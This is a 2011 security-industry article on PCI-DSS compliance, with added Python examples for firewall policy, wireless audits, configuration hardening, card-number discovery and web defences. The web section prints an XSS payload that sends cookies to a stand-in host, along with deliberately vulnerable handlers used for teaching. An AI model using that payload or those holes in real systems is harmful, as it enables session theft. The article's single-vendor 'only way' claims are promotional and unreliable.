
IFSEC Insider, formerly IFSEC Global, is the leading online community and news platform for security and fire safety professionals.
August 23, 2011


Towards a consolidated approach for PCI-DSS compliance

Recent press coverage has shown the extraordinary lengths cybercriminals will go to in order to breach target networks and steal valuable data for monetary or competitive gain. This is particularly apparent in electronic commerce, where full credit card account details sell at a premium on the black market.

Fortunately, the principal stakeholders in the card payment ecosystem have defined a standard that has proven to be highly effective (albeit not infallible) at protecting data from such breaches. Over the past five years, the PCI-DSS framework has evolved from a set of guidelines without enforceable sanctions into a ‘must-have’ validation of compliance for any organization that stores, processes or transmits cardholder data.

Despite its seemingly narrow focus on cardholder data protection, PCI-DSS spans most IT disciplines and skills, namely networking, databases, web applications, file systems, encryption and the core security processes such as vulnerability and configuration management. As a result, the cost of implementing compliance has been alarmingly high, bringing into question the applicability of the standard in terms of risk versus cost.

Earlier this year, the Ponemon Institute conducted a study in the U.S. on the actual costs of compliance among 160 enterprises, including 46 international ones. The results showed that, for mid-size organizations, the total cost of compliance with regulations such as PCI-DSS, SOX, HIPAA and others weighs in at an average of $3.5 million, while the consequential cost of non-compliance was estimated at $9.4 million. While these figures illustrate a sizeable return on the investment, the cost burden remains too great compared to the exposed risk for the majority of organizations where PCI-DSS is a requirement.

So, what strategies can be employed to reduce the complexities and costs of a PCI implementation? What are the principal concerns to consider in terms of PCI implementation?

PCI-DSS is multi-disciplinary and to fully comply with the standard, it is essential to take a global consolidated approach to address all 12 requirements as a whole before focusing on solving individual elements. The core IT disciplines to be considered are: Networking – Fixed; Networking – Wireless; Data and Databases; IT Assets/End-Points; and Web Applications.

Network – Fixed

The PCI core requirement here covers controlled network segregation, inbound/outbound traffic flows and DMZ implementation. Specific functions include: real-time perimeter anti-virus, IPsec/VPN tunnelling, IDS/IPS, use of strong cryptography (SSL/TLS or IPsec), a default ‘deny-all’ policy, support for digital certificates and two-factor user authentication, event monitoring, federated device management and reporting, and support for network vulnerability analysis. These services cannot be provided by a legacy firewall, even a so-called next-generation firewall. The only way to cost-effectively provide all of them without deploying multiple devices is a Unified Threat Management (UTM) appliance. A UTM-based solution can help organizations cover all fixed-network requirements of PCI while achieving greater overall PCI effectiveness and simultaneously minimizing implementation and operational costs. Note that the appliance alone does not satisfy Requirement 1: the standard also expects a documented business justification for every permitted flow, a review of the rule set at least every six months, and no direct connection between the Internet and the cardholder data environment.
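As an added illustration (not part of the original article or of any vendor's product), the following Python sketch models the segmentation and default deny-all rules described above: a first-match policy between constructed Internet, DMZ, CDE and management zones, plus a lint pass that flags what an assessor would question. The zones, addresses and rules are assumptions made for the example.

```python
"""Added example (not from the article or any vendor product): a first-match
firewall policy for a segmented cardholder data environment, with a default
deny-all and a lint pass over the rules. Zones, addresses and rules are
constructed for illustration."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed address plan: a zone is identified by its subnet; anything
# outside these subnets is treated as the untrusted Internet.
ZONES = {
    "DMZ": ipaddress.ip_network("10.10.0.0/24"),    # web tier, Internet-facing
    "CDE": ipaddress.ip_network("10.20.0.0/24"),    # card database tier
    "MGMT": ipaddress.ip_network("10.30.0.0/24"),   # administrators
}


def zone_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "INTERNET"


@dataclass(frozen=True)
class Rule:
    src_zone: str
    dst_zone: str
    proto: str
    dport: Optional[int]            # None = any destination port
    action: str                     # "allow" or "deny"
    justification: str              # PCI Req. 1 expects a documented reason per rule
    src_host: Optional[str] = None  # optionally pin the rule to one source address

    def matches(self, src: str, dst: str, proto: str, dport: int) -> bool:
        if self.src_host is not None and self.src_host != src:
            return False
        return (self.src_zone == zone_of(src) and self.dst_zone == zone_of(dst)
                and self.proto == proto and self.dport in (None, dport))


# Constructed rule set. First match wins, so order matters.
POLICY: List[Rule] = [
    Rule("INTERNET", "DMZ", "tcp", 443, "allow", "public HTTPS to the web tier"),
    Rule("DMZ", "CDE", "tcp", 5432, "allow", "web application to the card database",
         src_host="10.10.0.5"),
    Rule("MGMT", "DMZ", "tcp", 22, "allow", "administrator SSH to the web tier"),
    Rule("MGMT", "CDE", "tcp", 22, "allow", "administrator SSH to the database tier"),
]


def evaluate(src: str, dst: str, proto: str, dport: int) -> Tuple[str, str]:
    """Return (action, justification) for a flow; no match means deny."""
    for rule in POLICY:
        if rule.matches(src, dst, proto, dport):
            return rule.action, rule.justification
    return "deny", "default deny-all (no matching rule)"


def lint_policy(policy: List[Rule]) -> List[str]:
    """Flag allow rules an assessor would question: direct Internet-to-CDE
    access, missing business justification, and 'any port' allows."""
    findings = []
    for i, r in enumerate(policy):
        if r.action != "allow":
            continue
        if r.src_zone == "INTERNET" and r.dst_zone == "CDE":
            findings.append(f"rule {i}: direct Internet access to the CDE")
        if not r.justification.strip():
            findings.append(f"rule {i}: no business justification recorded")
        if r.dport is None:
            findings.append(f"rule {i}: allows any destination port")
    return findings


if __name__ == "__main__":
    for flow in [("203.0.113.7", "10.10.0.5", "tcp", 443),
                 ("203.0.113.7", "10.20.0.10", "tcp", 5432),
                 ("10.10.0.5", "10.20.0.10", "tcp", 5432),
                 ("10.10.0.6", "10.20.0.10", "tcp", 5432)]:
        print(flow, "->", evaluate(*flow))
    print("lint:", lint_policy(POLICY))
```

The point of the lint pass is that the device enforces the rules but the assessor reads them: every allow needs a recorded reason, and an Internet-to-CDE allow is a finding however it is worded.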

Network – Wireless

In many ways, the wireless network is subject to the same constraints as the fixed network, but it must also provide the following key functions:

– Support for both ‘thick’ and ‘thin’ access points (AP) solutions that can work in a seamless management framework,

– Detection of rogue APs against a defined hardware inventory,

– Support and logging of wireless IDS/IPS,

– Support for WPA2 Enterprise mode (IEEE 802.11i) with 802.1X authentication and AES-CCMP encryption; WEP is prohibited on wireless networks connected to the cardholder data environment, and WPA with TKIP should be treated as a migration step only.

In practice, the best approach in larger deployments is to minimize the deployment of thick APs, which have wireless control, IPS and similar functions built into the physical device, and favour thin APs, which are much easier to manage and maintain. Thin APs tunnel wireless traffic to wireless controllers, allowing significant economies of scale and simplified security management through a ‘single pane of glass’ console for increased visibility and policy enforcement.
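The rogue-AP and encryption checks above can be expressed as a simple audit of scan results against the hardware inventory. The following Python is an added example, not code from the article or from any controller product; the inventory, the SSID names and the scan records are constructed for illustration.

```python
"""Added example (not from the article): audit a wireless scan against a
defined AP inventory, as a wireless IDS or controller would. The inventory,
the scan records and the SSID names are constructed for illustration."""
from typing import Dict, List, Set, Tuple

# Constructed inventory of authorised access points: BSSID -> expected SSID.
INVENTORY: Dict[str, str] = {
    "aa:bb:cc:00:00:01": "CORP-POS",
    "aa:bb:cc:00:00:02": "CORP-POS",
    "aa:bb:cc:00:00:03": "CORP-GUEST",
}
# SSIDs that carry cardholder data or connect to the CDE (constructed).
CDE_SSIDS: Set[str] = {"CORP-POS"}

# Constructed scan output in the shape a site survey or WIDS sensor reports.
SCAN: List[Dict[str, str]] = [
    {"bssid": "AA:BB:CC:00:00:01", "ssid": "CORP-POS", "auth": "WPA2-EAP", "cipher": "CCMP"},
    {"bssid": "aa:bb:cc:00:00:02", "ssid": "CORP-POS", "auth": "WPA2-PSK", "cipher": "CCMP"},
    {"bssid": "de:ad:be:ef:00:01", "ssid": "CORP-POS", "auth": "WPA2-EAP", "cipher": "CCMP"},
    {"bssid": "11:22:33:44:55:66", "ssid": "linksys", "auth": "OPEN", "cipher": "NONE"},
    {"bssid": "aa:bb:cc:00:00:03", "ssid": "CORP-GUEST", "auth": "WPA2-PSK", "cipher": "CCMP"},
]


def cde_grade(ap: Dict[str, str]) -> bool:
    """WPA2 Enterprise (802.1X/EAP) with AES-CCMP is what a CDE SSID needs;
    PSK, TKIP, WEP or open networks do not qualify."""
    return ap["auth"] == "WPA2-EAP" and ap["cipher"] == "CCMP"


def audit_scan(scan, inventory, cde_ssids) -> List[Tuple[str, str]]:
    """Return (bssid, finding) pairs. Findings:
      evil-twin      unknown BSSID advertising one of our SSIDs
      unknown-ap     unknown BSSID with a foreign SSID (rogue on our wire or a
                     neighbour; wired-side correlation is needed to tell which)
      ssid-mismatch  inventoried AP broadcasting the wrong SSID
      weak-security  CDE SSID not on WPA2-Enterprise/AES
      missing-ap     inventoried AP not seen at all (down, moved or replaced)
    """
    findings = []
    seen = set()
    known_ssids = set(inventory.values())
    for ap in scan:
        bssid = ap["bssid"].lower()     # vendors differ on case; normalise
        seen.add(bssid)
        expected = inventory.get(bssid)
        if expected is None:
            kind = "evil-twin" if ap["ssid"] in known_ssids else "unknown-ap"
            findings.append((bssid, kind))
            continue
        if ap["ssid"] != expected:
            findings.append((bssid, "ssid-mismatch"))
        if ap["ssid"] in cde_ssids and not cde_grade(ap):
            findings.append((bssid, "weak-security"))
    for bssid in inventory:
        if bssid.lower() not in seen:
            findings.append((bssid.lower(), "missing-ap"))
    return findings


if __name__ == "__main__":
    for bssid, finding in audit_scan(SCAN, INVENTORY, CDE_SSIDS):
        print(f"{bssid}  {finding}")
```

Run against the constructed scan, this reports the second corporate AP for running PSK instead of 802.1X, the unknown BSSID impersonating CORP-POS as an evil twin, and the open "linksys" network as an unknown AP; the guest SSID on PSK is not flagged because it is outside the CDE set.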

IT Assets / Endpoints

IT assets include servers, desktops, laptops, operating systems, mobile devices and network equipment. The core objective is to ensure that all assets that constitute the PCI cardholder data environment are subject to the core security management processes.

Here, in order to have the most effective approach in meeting the PCI DSS requirements at minimal cost and complexity, it is important to consider the management of deployed endpoint security technologies and controls. The top 5 elements on the check list are:

– Support for asset vulnerability management to ensure that all operating systems are patched to the latest version and to assess configuration specific vulnerabilities;

– Configuration management capability against globally accepted best practices for operating system platform deployment (e.g. NIST checklists, FDCC);

– Endpoint policy control to blacklist/whitelist software, processes, devices, drivers, access lists etc.;

– Automated remediation of configuration and audit issues for cost-effective operation;

– Deployment of client/mobile device anti-virus, preferably centrally administered.
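To make the configuration-management and automated-remediation items concrete, here is an added Python example (not from the article or any endpoint product) that checks a constructed sshd_config fragment against a small hardening baseline and rewrites it to comply. The baseline values are assumptions standing in for a full CIS or NIST checklist.

```python
"""Added example (not from the article): check a host configuration file
against a hardening baseline and produce a remediated copy, the kind of
configuration-management and automated-remediation step listed above.
The baseline values and the sshd_config fragment are constructed."""
from typing import Dict, List, Optional, Tuple

# Constructed baseline: keyword -> required value. Real baselines (CIS, NIST
# checklists) have many more entries; these are illustrative.
BASELINE: Dict[str, str] = {
    "Protocol": "2",
    "PermitRootLogin": "no",
    "PasswordAuthentication": "no",
    "X11Forwarding": "no",
    "MaxAuthTries": "4",
}

# Constructed sshd_config fragment with typical drift from the baseline.
SAMPLE_CONFIG = """\
# sshd_config (constructed sample)
Port 22
Protocol 2
PermitRootLogin yes
#PasswordAuthentication no
X11Forwarding yes
"""


def parse_config(text: str) -> Dict[str, str]:
    """Keyword/value pairs, ignoring blanks and comments. Like sshd itself,
    the first occurrence of a keyword wins; a commented-out line sets nothing
    (sshd then uses its compiled-in default, which is why it is a finding)."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        parts = s.split(None, 1)
        if len(parts) == 2:
            settings.setdefault(parts[0], parts[1].strip())
    return settings


def check_config(text: str, baseline: Dict[str, str]) -> List[Tuple[str, Optional[str], str]]:
    """(keyword, current value or None, required value) for every deviation."""
    current = parse_config(text)
    return [(key, current.get(key), want)
            for key, want in baseline.items() if current.get(key) != want]


def remediate(text: str, baseline: Dict[str, str]) -> str:
    """Rewrite the file so it meets the baseline: every active line for a
    baseline keyword is replaced with the required value, anything not in the
    baseline (including comments) is left untouched, and missing keywords
    are appended."""
    out: List[str] = []
    seen = set()
    for line in text.splitlines():
        s = line.strip()
        key = s.split(None, 1)[0] if s and not s.startswith("#") else None
        if key in baseline:
            seen.add(key)
            out.append(f"{key} {baseline[key]}")
        else:
            out.append(line)
    for key, want in baseline.items():
        if key not in seen:
            out.append(f"{key} {want}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for key, cur, want in check_config(SAMPLE_CONFIG, BASELINE):
        print(f"{key}: have {cur!r}, need {want!r}")
    print(remediate(SAMPLE_CONFIG, BASELINE))
```

The check reports four deviations on the sample (root login enabled, password authentication left at its default because the line is commented out, X11 forwarding on, and no MaxAuthTries), and the remediated copy passes the same check with the unrelated Port line and the comments preserved.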

Data & Databases

It is impossible to comply with PCI DSS without implementing a database security solution to protect against data loss or fraud. Whether due to an error or a deliberate intent to harm, data loss can have serious consequences. In order to meet PCI-DSS compliance, a database security solution must include:

– Database-specific vulnerability assessment and penetration testing;

– Configuration management for assessment against global best practices and/or the organisation’s own data security standards;

– Access control assessment both at the database and the application levels;

– Real-time monitoring of database users and their activity on both the database and critical cardholder data.

In order to simplify the creation and enforcement of data security policies that will help meet PCI-DSS compliance, it is important to look for a centrally-managed database security solution that provides all of the above features on one device. Enhanced solutions include features such as automatic database and sensitive data discovery. Further desirable functions include pre-built policies that cover standard industry and government requirements that when combined with a comprehensive set of graphical reports deliver out-of-the-box readiness and immediate value for PCI-DSS compliance.
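Sensitive-data discovery, mentioned above as an enhanced feature, reduces to finding candidate card numbers in arbitrary text and filtering out the false positives. The following Python example is added here and is not the article's or any product's code; the sample text uses the standard published test card numbers, and the issuer table is a deliberately simplified assumption.

```python
"""Added example (not from the article or any product): sensitive-data
discovery for primary account numbers (PANs) in arbitrary text such as log
files, database dumps or ticket notes, with masking of what is found.
The sample text, the test card numbers and the simplified issuer table are
constructed; real scanners carry a much fuller issuer/length table."""
import re
from typing import List, Optional, Tuple

# 13 to 19 digits, optionally separated by single spaces or dashes, not
# embedded in a longer digit run.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check digit validation (ISO/IEC 7812)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def issuer(digits: str) -> Optional[str]:
    """Simplified issuer identification by prefix and length (assumption:
    only Visa, Mastercard and American Express ranges are modelled)."""
    n = len(digits)
    if digits.startswith("4") and n in (13, 16, 19):
        return "visa"
    if n == 16 and (51 <= int(digits[:2]) <= 55 or 2221 <= int(digits[:4]) <= 2720):
        return "mastercard"
    if n == 15 and digits[:2] in ("34", "37"):
        return "amex"
    return None


def find_pans(text: str) -> List[Tuple[str, str]]:
    """Return (pan, issuer) for each candidate that passes both the Luhn
    check and the issuer table. Luhn alone is not proof: one in ten random
    digit strings passes, so order IDs and timestamps would be reported."""
    hits = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        brand = issuer(digits)
        if brand is not None and luhn_ok(digits):
            hits.append((digits, brand))
    return hits


def mask_pan(pan: str) -> str:
    """PCI DSS Req. 3.3: display at most the first six and last four digits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed sample: a log line, a SQL dump row and a support note. The card
# numbers are the standard published test numbers, not real accounts.
SAMPLE_TEXT = """\
2011-08-23 10:15:02 order=1234567890123456 card=4111 1111 1111 1111 amount=19.99
INSERT INTO payments VALUES (42, '378282246310005', '2013-12');
support note: customer read 5500-0000-0000-0004 over the phone; ticket 4111111111111112
"""

if __name__ == "__main__":
    for pan, brand in find_pans(SAMPLE_TEXT):
        print(f"{brand:<10} {mask_pan(pan)}")
```

On the sample, the 16-digit order number and the ticket number (which fails Luhn) are dropped while the three real test numbers are reported, spaces and dashes included. A scanner that stops at the regular expression would flag every timestamp and order ID in the log and be switched off within a week.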

Web Applications

As web applications are particularly exposed to the outside world, the PCI-DSS standard addresses them specifically in requirement 6.6, which offers two methods for public-facing web applications:

– Review them for vulnerabilities, using manual or automated application vulnerability assessment tools or methods, at least annually and after any change, or

– Deploy a web application firewall in front of them.

While code reviews/testing are essentially process in nature, a significant cost saving can be made through the implementation of a Web application firewall. The key functions that should be included in such a solution are:

– Support of OWASP Web security guidance, cross-site scripting (XSS) and cross site request forgery (CSRF) vulnerability protection;

– Protection against DoS and buffer-overflow type attacks at both the HTTP protocol and HTML content level;

– Access control and web application user authentication;

– Monitoring and management of error events;

– Incorporation of a web application vulnerability scanning capability for regular internal scans.
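To show what the application-review option of requirement 6.6 looks for, here is an added Python example (not from the article or any WAF product) with the two defects listed above, reflected XSS and CSRF, each as a vulnerable handler beside its hardened form. The handlers are framework-free functions over pre-parsed input; the session identifiers and the signing secret are constructed.

```python
"""Added example (not from the article): the two classes of defect the
article names, reflected XSS and CSRF, each shown as the vulnerable handler
beside its hardened form. This is what the "review the application" option
of Requirement 6.6 is looking for; a WAF in front of the vulnerable versions
is the other option. Handlers are framework-free functions taking pre-parsed
input; the session identifiers and secret are constructed."""
import hashlib
import hmac
import html
import secrets
from urllib.parse import parse_qs

# Per-deployment secret for minting CSRF tokens (constructed; in a real app
# it comes from configuration, never from source code).
CSRF_SECRET = secrets.token_bytes(32)


# --- Reflected XSS ---------------------------------------------------------

def search_page_vulnerable(query: str) -> str:
    """Echoes the query straight into HTML, so a crafted query runs script."""
    return f"<h1>Results for {query}</h1>"


def search_page_hardened(query: str) -> str:
    """Context-appropriate output encoding: the browser sees text, not markup."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


# --- CSRF ------------------------------------------------------------------

def csrf_token(session_id: str) -> str:
    """Token bound to the session so it cannot be reused across sessions
    (HMAC of the session id; a per-request nonce would also work)."""
    return hmac.new(CSRF_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(session_id: str, body: str) -> dict:
    """Acts on any POST that arrives with a valid session cookie. A page on
    another site can auto-submit this form in the victim's browser."""
    form = parse_qs(body)
    return {"ok": True, "to": form["to"][0], "amount": form["amount"][0]}


def transfer_hardened(session_id: str, body: str) -> dict:
    """Requires a token the attacker's page cannot know; the comparison is
    constant-time so the token cannot be guessed byte by byte."""
    form = parse_qs(body)
    supplied = form.get("csrf", [""])[0]
    if not hmac.compare_digest(supplied.encode(), csrf_token(session_id).encode()):
        return {"ok": False, "error": "missing or invalid CSRF token"}
    return {"ok": True, "to": form["to"][0], "amount": form["amount"][0]}


if __name__ == "__main__":
    payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    print(search_page_vulnerable(payload))
    print(search_page_hardened(payload))
    forged = "to=attacker&amount=1000"
    print(transfer_vulnerable("sess-123", forged))
    print(transfer_hardened("sess-123", forged))
    print(transfer_hardened("sess-123", forged + "&csrf=" + csrf_token("sess-123")))
```

A WAF can block the first payload by signature, but it cannot tell a forged transfer from a legitimate one because the two requests are byte-for-byte identical apart from the token the application itself must demand; that asymmetry is why the two options in 6.6 are not interchangeable for every defect class.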

The multi-disciplinary nature of PCI-DSS creates complexity and, consequently, organizations have no choice but to deploy a combination of security devices to fully address the requirements of the standard. It is critical to take a consolidated approach in order to improve performance and security and to reduce cost.

In fact, using a large range of solution vendors results in a wide array of disparate products and services introduced into the PCI solution, with the consequence of spiraling complexity (in terms of support, maintenance, resource training, etc.) and total cost of ownership. Minimizing the number of vendors to work with, to a single one if possible, is the only way to dramatically reduce Opex and Capex while removing complexity from implementation and management.

A common platform provided by a single vendor will also enable organizations to enhance their security posture, coverage and visibility for a lower overall risk of PCI project failure.
